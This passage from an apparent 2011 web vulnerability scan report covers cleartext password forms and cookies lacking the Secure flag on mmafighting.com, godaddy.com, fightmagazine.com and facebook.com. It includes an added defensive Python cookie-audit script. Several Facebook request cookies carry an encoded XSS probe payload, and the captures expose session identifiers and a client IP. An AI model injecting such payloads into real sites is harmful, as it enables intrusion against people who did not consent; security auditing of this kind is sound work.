X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a comment form with the action URL #comments (method="post"), which resolves to the page's own URL and is therefore submitted over clear-text HTTP. The form contains the password field AuthorPassword.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a comment form with the action URL #comments (method="post"), which resolves to the page's own URL and is therefore submitted over clear-text HTTP. The form contains the password field AuthorPassword.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

6. SSL cookie without secure flag set
There are 17 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
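Checking for this issue is a matter of parsing each Set-Cookie header of an HTTPS response and looking for the Secure attribute; the harder part is telling a session token apart from a harmless preference cookie, which the report does by inspection. The script below is an added example (not part of this report and not Burp's own check) that parses Set-Cookie values, flags the ones lacking Secure, applies a name-and-entropy heuristic for session-like cookies, and prints the corrected header. The sample headers are taken from the GoDaddy response in 6.2, plus one constructed header that is already correct.

```python
"""Audit Set-Cookie headers from an HTTPS response for the Secure attribute."""
import math
import re
from collections import Counter

# Three headers from the response in 6.2 of this report, plus one constructed
# header ("pref") that already carries Secure and should not be reported.
SAMPLE_HEADERS = [
    "ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly",
    "adc1=US; domain=godaddy.com; path=/",
    "HPBackground=DanicaImageOne; path=/",
    "pref=dark; path=/; Secure; SameSite=Lax",
]

SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.I)


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=val' into (name, value, [(attr, val), ...])."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")     # first '=' only; values may contain '='
    attrs = []
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs.append((k.strip(), v.strip()))
    return name.strip(), value, attrs


def has_flag(attrs, flag):
    """Cookie attribute names are case-insensitive (RFC 6265)."""
    return any(k.lower() == flag.lower() for k, _ in attrs)


def _bits_per_char(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_session_token(name, value):
    """Heuristic only: a suggestive name, or a long opaque high-entropy value."""
    if SESSION_NAME_RE.search(name):
        return True
    opaque = re.fullmatch(r"[A-Za-z0-9_\-+/]{16,}", value) is not None
    return opaque and _bits_per_char(value) > 3.5


def harden(name, value, attrs):
    """Re-emit the cookie with Secure added; nothing else is changed."""
    parts = [f"{name}={value}"] + [f"{k}={v}" if v else k for k, v in attrs]
    if not has_flag(attrs, "Secure"):
        parts.append("Secure")
    return "; ".join(parts)


def audit_set_cookie_headers(headers):
    """Return one finding per cookie issued without Secure."""
    findings = []
    for h in headers:
        name, value, attrs = parse_set_cookie(h)
        if has_flag(attrs, "Secure"):
            continue
        findings.append({
            "name": name,
            "session_like": looks_like_session_token(name, value),
            "httponly": has_flag(attrs, "HttpOnly"),
            "fixed": harden(name, value, attrs),
        })
    return findings


if __name__ == "__main__":
    for f in audit_set_cookie_headers(SAMPLE_HEADERS):
        flag = "SESSION?" if f["session_like"] else "        "
        print(f"{flag} {f['name']:20} -> {f['fixed']}")
```

Only headers from responses fetched over HTTPS are worth auditing this way; a cookie set over plain HTTP is already exposed regardless of its attributes. Note also that HttpOnly, present on the ASP.NET_SessionId cookie here, does nothing against network capture: it stops script access, while Secure is what keeps the browser from sending the cookie over HTTP.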


6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDCSSSACAT. The cookie appears to contain a session token (it is the classic ASP session identifier), which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

6.2. https://www.godaddy.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below). The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue; it carries HttpOnly but not Secure. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.3. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below). The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue; it carries HttpOnly but not Secure. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.4. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.5. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.6. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

6.7. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.8. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.9. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.10. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
